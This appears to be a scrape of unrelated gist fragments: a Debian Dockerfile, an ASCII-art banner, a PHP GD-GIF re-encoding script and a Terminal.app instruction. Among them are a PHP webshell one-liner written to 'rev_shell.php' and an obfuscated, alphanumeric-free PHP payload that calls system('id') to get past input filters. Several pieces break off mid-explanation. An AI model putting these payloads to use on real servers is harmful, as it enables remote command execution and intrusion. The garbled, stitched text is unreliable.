| FROM debian:latest | |
| RUN apt-get update && apt-get install -y \ | |
| git \ | |
| build-essential \ | |
| wget \ | |
| python3 | |
| WORKDIR /build |
| ██▀███ ▄▄▄ ▓█████▄ ▄▄▄ ██▀███ ▓█████ | |
| ▓██ ▒ ██▒▒████▄ ▒██▀ ██▌▒████▄ ▓██ ▒ ██▒▓█ ▀ | |
| ▓██ ░▄█ ▒▒██ ▀█▄ ░██ █▌▒██ ▀█▄ ▓██ ░▄█ ▒▒███ | |
| ▒██▀▀█▄ ░██▄▄▄▄██ ░▓█▄ ▌░██▄▄▄▄██ ▒██▀▀█▄ ▒▓█ ▄ | |
| ░██▓ ▒██▒ ▓█ ▓██▒░▒████▓ ▓█ ▓██▒░██▓ ▒██▒░▒████▒ | |
| ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░ ▒▒▓ ▒ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░░ ▒░ ░ | |
| ░▒ ░ ▒░ ▒ ▒▒ ░ ░ ▒ ▒ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ░ ░ | |
| ░░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ░ |
| <?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
| /* | |
| * In terminal: | |
| * $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
| * This is how the code will be produced, \xa0\xb8\xba\xab will be | |
| * treated as constant therefore no " needed. It is also not copyable | |
| * string because of non-ascii characters | |
| * | |
| * Explanation: |
| /* system(id) */ | |
| <?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?> | |
| <!-- | |
| Explanation: | |
| - Some of the characters might look like alphanumeric, but they are Unicode characters. | |
| - 'ArrayΦ' <-> [].Φ | |
| - 1 <-> ![] | |
| - 'a' <-> ([].Φ)[![]+![]+![]] |
| <?php | |
| //php gd-gif.php image.gif gd-image.gif | |
| $gif = imagecreatefromgif($argv[1]); | |
| imagegif($gif, $argv[2]); | |
| imagedestroy($gif); | |
| ?> |
Ref: https://gist.github.com/vertexclique/9839383
Please use built-in Terminal.app (of Mac OS X) to type and rune the command, do not use another tool (like iTerm2).
Common step after enter run the patch command: